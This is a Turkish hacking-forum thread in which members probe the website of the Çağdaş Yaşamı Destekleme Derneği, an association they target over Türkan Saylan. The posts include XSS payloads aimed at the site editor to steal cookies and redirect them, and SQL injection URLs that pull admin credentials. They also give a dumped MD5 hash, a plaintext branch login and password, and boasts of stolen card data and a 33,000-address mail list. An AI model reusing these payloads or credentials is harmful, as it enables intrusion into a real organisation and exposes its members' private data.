Çağdaş Yaşamı Destekleme Derneği XSS"Leri

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    BartheZ
    BartheZ's avatar
    Bilgi/Destek Madalyası Üstün Hizmet Madalyası
    Kayıt Tarihi: 03/Haziran/2002
    Erkek

    öncelikle çok büyük bir etki yaratabilecek xss açığı bulamadım. birkaç yerde açık var ama bu sitenin içeriğine erişim sağlamıyor. benim xss yiyen 2 tane açığım;

    1 - Editöre mesaj gönderme konsolunda, bu editöre değil başka bi yere de gidebilir tabi 

    http://www.cydd.org.tr/mesaj.asp?kime=BartheZ&konu=Tahribat

    2 - E-posta ekleme hücresinde. Yine burda html kodu çalıştırabiliyosunuz.

     

    Birde şube giriş konsolları var ancak MySql Injection açığı yok. Bilmiyorum farklı açıklar bulup indirebilen çıkar mı

    buyrun: http://www.cydd.org.tr/subegiris.asp 

     

    Türkan Saylan olayı.. Niye ÇYDD diye soran olursa.. 


    on error go to hell
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    delidervis
    delidervis's avatar
    Kayıt Tarihi: 05/Mart/2007
    Erkek
    helal sana hocam süpersin tam destek hep destek..
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ByALeX
    ByALeX's avatar
    Kayıt Tarihi: 24/Ağustos/2005
    Erkek
    TebrikLer Eyw (:

    Alim ile Sohbet Etmek Zümrüt ile incidir, Cahil ile Sohbet Etme Günde Bin Can incitir. Alim ile Sohbet Etmek Mertebe, Cahil ile Sohbet Etme Dönersin Merkebe, Eşek Alim Olmaz Kitap Taşımakla Tekkeye, insan da Hacı Olmaz Gitmekle Mekkeye.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    turunc4u
    turunc4u's avatar
    Kayıt Tarihi: 16/Ağustos/2006
    Erkek
    BartheZ bunu yazdı:
    -----------------------------

    öncelikle çok büyük bir etki yaratabilecek xss açığı bulamadım. birkaç yerde açık var ama bu sitenin içeriğine erişim sağlamıyor. benim xss yiyen 2 tane açığım;

    1 - Editöre mesaj gönderme konsolunda, bu editöre değil başka bi yere de gidebilir tabi 

    http://www.cydd.org.tr/mesaj.asp?kime=BartheZ&konu=Tahribat

     

    Türkan Saylan olayı.. Niye ÇYDD diye soran olursa.. 


    -----------------------------
    http://www.cydd.org.tr/default.asp?sayfa=forum Forumda kullanıcılar var onlara gidebilir :) Sitenin admini: editor  :)

    http://www.cydd.org.tr/default.asp?sayfa=mesaj&kime=xxs&konu=xss

     bLuetuLips<script></script><script>alert(document.cookie);</script><script>alert('Hmm XSS yiyiyo guzelce');</script><script>location.href('http://xssadresi/');</script>

    alttaki gibi olmuyo :) ama editore yukardaki gibi yollanırsa kesin olur ehueheueh inş :)

    http://www.cydd.org.tr/default.asp?sayfa=mesaj&kime=editor&konu=bLuetuLips<script></script><script>alert(document.cookie);</script><script>alert('Hmm XSS yiyiyo guzelce');</script><script>location.href('http://xssadresi/');</script>

  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    turunc4u
    turunc4u's avatar
    Kayıt Tarihi: 16/Ağustos/2006
    Erkek

    Server Error in Forum Application
    An error has occured while connecting to the database.
    Please contact the forum administrator.

    Support Error Code:- err_Access_db_connection
    File Name:- common.asp

    Error details:-
    Microsoft JET Database Engine
    Could not find file 'd:\cydd-org-tr\cyddorgtr\Forum\CYDDForum.mdb'.

    Hocam az kaldı bu sitenin açığını buluyorum :D forumu sistemlerinden kaldırmışlar ama yakalıcam bi açıklarını

  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    pesimistzombie
    pesimistzombie's avatar
    Kayıt Tarihi: 14/Haziran/2006
    Erkek

    duyuru eklemeleri için elbette bi panelleri vardır veya şu şube olayı eğer aynı db deyse buyrun sql deneyin

    http://www.cydd.org.tr/duyuru.asp?id=-1%20union+select+0,0+from+users+where+kullanici='admin'

     


    :|
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    decameron
    decameron's avatar
    Üstün Hizmet Madalyası Bilgi/Destek Madalyası Savaş Madalyası
    Kayıt Tarihi: 29/Haziran/2003
    Erkek
    gidin nakşibendi falan ipi sapı belli olmayan yasadışı tarikatların sitelerini hackleyin daha mahbuldür.

    Etinden korkanın kemiğini sikeyim!
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Tabela Fatihi
    kaygusuz
    kaygusuz's avatar
    Kayıt Tarihi: 06/Nisan/2007
    Erkek

    DecaMeroN bunu yazdı:
    -----------------------------
    gidin nakşibendi falan ipi sapı belli olmayan yasadışı tarikatların sitelerini hackleyin daha mahbuldür.

    -----------------------------

    abü güzel diyosun da şunu belirteyim onlar beşiktaştada bi arkaadaş söylemişti onlar yüzyıllar önceden beri varızve olacağız hep diye içlerinde besledikleri içinde devamlı olacaktır eminim şu zamanda da benim tavsiyem pkk siteleri ilk başta


    Aldananlar aldanmaktan zevk aldıkları için hile ortaya çıkmıyordu Tolstoy
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    turunc4u
    turunc4u's avatar
    Kayıt Tarihi: 16/Ağustos/2006
    Erkek

    Çağdaş yaşamı destekleyen yasakçı bi vakıf bölee bişi olabilir mi? Türkan Saylana aşırı gıcık kapıyorum :D Bu sisteme girilse en az 100 subdomain var. pesimistzombie malesef sql açık yok. Adamlar her türlü önlemlerini almışlar bekliyolar forumlar kapalı ziyaretci dft. bilmemne herşeyleri kapalı :D

    http://www.eskisehir.cydd.org.tr/sadesade/pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+%20from+members+where+uye_id=1

    mencoglu
    c21ec73ddef2f89bd07611386e5c333e

    md5 :)
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    8mm
    8mm's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 01/Mart/2003
    Erkek

    Sitenin admin şifresinden kredi kartı bilgilerine..

    33.000 kusur mail listesinden 100 kusur subdomaini,

    Ve sube şifrelerini aldım :)

    Bu arada bLuetuLips Eskisehir'in login şifresi o değil o kendi sitesine login olduğu şifre.

    http://www.cydd.org.tr/subegiris.asp

    Kullanıcı: eskisehir

    Şifre: 6riyiju1

    Bu arada bu accounttan en son login olan kullanıcı sisteme : 14 defa girmiş son girişi : 03.04.2007 22:57:02 :))

    http://img513.imageshack.us/img513/2797/cyji2.png


    Kimse sana özgürlük veremez. Kimse sana eşitlik veya adalet veya başka birşey veremez. Eğer adamsan, sen alırsın. 8mm@tahribat.com
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    turunc4u
    turunc4u's avatar
    Kayıt Tarihi: 16/Ağustos/2006
    Erkek
    8mm bunu yazdı:
    -----------------------------

    Sitenin admin şifresinden kredi kartı bilgilerine..

    33.000 kusur mail listesinden 100 kusur subdomaini,

    Ve sube şifrelerini aldım :)

    Bu arada bLuetuLips Eskisehir'in login şifresi o değil o kendi sitesine login olduğu şifre.

    http://www.cydd.org.tr/subegiris.asp

    Kullanıcı: eskisehir

    Şifre: 6riyiju1

    Bu arada bu accounttan en son login olan kullanıcı sisteme : 14 defa girmiş son girişi : 03.04.2007 22:57:02 :))


    -----------------------------

    Çok büyük bi haber olabilir :D Tv kanallarında filan :) Ben o kadar uğraştım amk. "Mdb"

Toplam Hit: 5859 Toplam Mesaj: 32